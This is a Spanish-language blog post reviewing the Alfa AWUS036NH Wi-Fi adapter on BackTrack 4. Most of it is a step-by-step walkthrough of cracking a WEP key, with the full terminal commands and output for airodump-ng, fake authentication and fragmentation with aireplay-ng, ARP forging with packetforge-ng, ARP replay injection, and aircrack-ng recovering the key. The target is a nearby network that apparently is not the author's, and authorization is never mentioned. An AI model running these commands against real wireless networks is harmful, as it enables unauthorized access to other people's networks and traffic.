Alfa 2w Modo Monitor (AWUS036NH - rt2800usb)
El alfa 2000mw soporta modo monitor en BackTrack 4 r2 sin instalar nada de nada, automáticamente la reconoce con el driver rt2800usb. El alfa 2w me llego ayer mismo, lo primero que hice es averiguar si soportaba modo monitor y como podrán ver en este post, si que soporta. En cuanto a inyección es brutal!!, arriba de los 500 datas por segundo.
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
root@bt:~#
Iniciamos airmon-ngroot@bt:~# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
6179 dhclient
6179 dhclient
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode enabled on mon0)
root@bt:~#
Ahora lo tenemos en modo monitor, listo para empezar auditar!!root@bt:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=7 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=7 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
root@bt:~#
Iniciamos airodump-ng para mirar un objetivo. CH 6 ][ Elapsed: 4 s ][ 2011-02-26 13:16
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
5C:4C:A9:XX:XX:XX 33 3 0 0 11 54e WEP WEP GUSAB
5C:4C:A9:XX:XX:XX 33 4 0 0 1 54e WEP WEP INFINITUMcb9
00:18:3F:XX:XX:XX 6 5 0 0 6 54 . WEP WEP 2WIRE6743
BSSID STATION PWR Rate Lost Packets Probes
Una vez escogido el objetivo, lanzamos airodump-ng.root@bt:~# airodump-ng --bssid 00:18:3F:XX:XX:XX -c 6 -w captura mon0
Lanzado airodump-ng, ahora toca asociarnos con el objetivo.root@bt:~# aireplay-ng -e 2WIRE6743 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -1 0 mon0
13:19:11 Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6
13:19:11 Sending Authentication Request (Open System) [ACK]
13:19:11 Authentication successful
13:19:11 Sending Association Request [ACK]
13:19:11 Association successful :-) (AID: 1)
Como puede ver, con el alfa 2w asocio a la primera y eso que el router estaba muy distante y con muchos obstáculos. Ahora solo lanzamos cualquier ataque con el areplay-ng, en mi caso lance el ataque de fragmentación (ataque 5).
root@bt:~# aireplay-ng -5 -b 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0
13:19:20 Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6
13:19:20 Waiting for a data packet...
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:18:3F:XX:XX:XX
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:18:3F:XX:XX:XX
0x0000: 0842 3a01 ffff ffff ffff 0018 3f18 85c9 .B:.........?...
0x0010: 0018 3f18 85c9 6076 c7c0 3f00 3130 92ea ..?...`v..?.10..
0x0020: f56f eb33 e447 71e0 3365 0e61 e8f1 dd2a .o.3.Gq.3e.a...*
0x0030: 1246 669b bf66 bd76 e9dd 234a b45d 9327 .Ff..f.v..#J.].'
0x0040: 4642 6ad2 FBj.
Use this packet ? y
Saving chosen packet in replay_src-0226-131920.cap
13:19:22 Data packet found!
13:19:22 Sending fragmented packet
13:19:22 Got RELAYED packet!!
13:19:22 Trying to get 384 bytes of a keystream
13:19:22 Got RELAYED packet!!
13:19:22 Trying to get 1500 bytes of a keystream
13:19:22 Got RELAYED packet!!
Saving keystream in fragment-0226-131922.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
root@bt:~#
Y como pueden ver es totalmente soportado y la inyeccion es brutal!!. Una vez generado el archivo PRGA (del ingles “pseudo random generation algorithm” o algoritmo de generación seudo aleatoria) con extención ".xor", usaremos packetforge-ng para crear un paquete arp. Nuestro objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.root@bt:~# packetforge-ng -0 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y fragment-0226-131922.xor -w ARP
Wrote packet to: ARP
Inyección del paquete ARP con areplay-ng.root@bt:~# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:XX:XX:XX)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:18:3F:XX:XX:XX
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:C0:CA:XX:XX:XX
0x0000: 0841 0201 0018 3f18 85c9 00c0 ca4a 8297 .A....?......J..
0x0010: ffff ffff ffff 8001 c7c0 4300 1018 b7e1 ..........C.....
0x0020: 6cde c857 5ad1 d077 a046 b99e 35b7 98fa l..WZ..w.F..5...
0x0030: 5f01 7c1c 5afb 7836 bc01 eaa3 f9f8 b69e _.|.Z.x6........
0x0040: 02ca b6ee ....
Use this packet ? y
Saving chosen packet in replay_src-0226-131938.cap
You should also start airodump-ng to capture replies.
En el anterior paso habrán bien los ojos! y miren como inyecta el alfa 2000mw. Por ultimo lanzamos aircrack-ng para obtener la clave WEP.root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 106515 packets.
# BSSID ESSID Encryption
1 00:18:3F:XX:XX:XX 2WIRE6743 WEP (32632 IVs)
Choosing first network as target.
Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 32822 ivs.
Aircrack-ng 1.1 r1738
[00:00:00] Tested 258 keys (got 32812 IVs)
KB depth byte(vote)
0 30/ 33 92(36096) 62(35840) 76(35840) 84(35840) BC(35840)
1 0/ 1 02(47616) 6A(41216) E8(40704) 03(40192) D3(40192)
2 0/ 4 95(44544) 9A(42496) 44(39936) 31(39680) 15(38912)
3 0/ 2 92(45568) F4(40704) 05(40448) 86(40448) 35(39424)
4 0/ 1 80(48896) 1E(40192) 7A(39936) 16(39424) 94(39424)
KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%
root@bt:~#
Sin duda me sorprendi, ya que antes de comprar el alfa, donde quiera habia leido que no servia para auditoria, pero ya ven si que sirve. Ha sido mi mejor adquisicion, para mi es la mejor de todas, tengo otros tres dipositivos USB, el WifiSky, el Kasens G5000 y el dragon FL-2016G pero sin duda puedo decir que barre con las tres!Saludos y ahora que me entreguen mi camara lestomare unas fotitos para compartirlo con todos y platicarles el precio y los detalles de esta nueva adquisición.
Update:
Por cierto ya estan las primeras imagenes de BackTrack 5 !!!
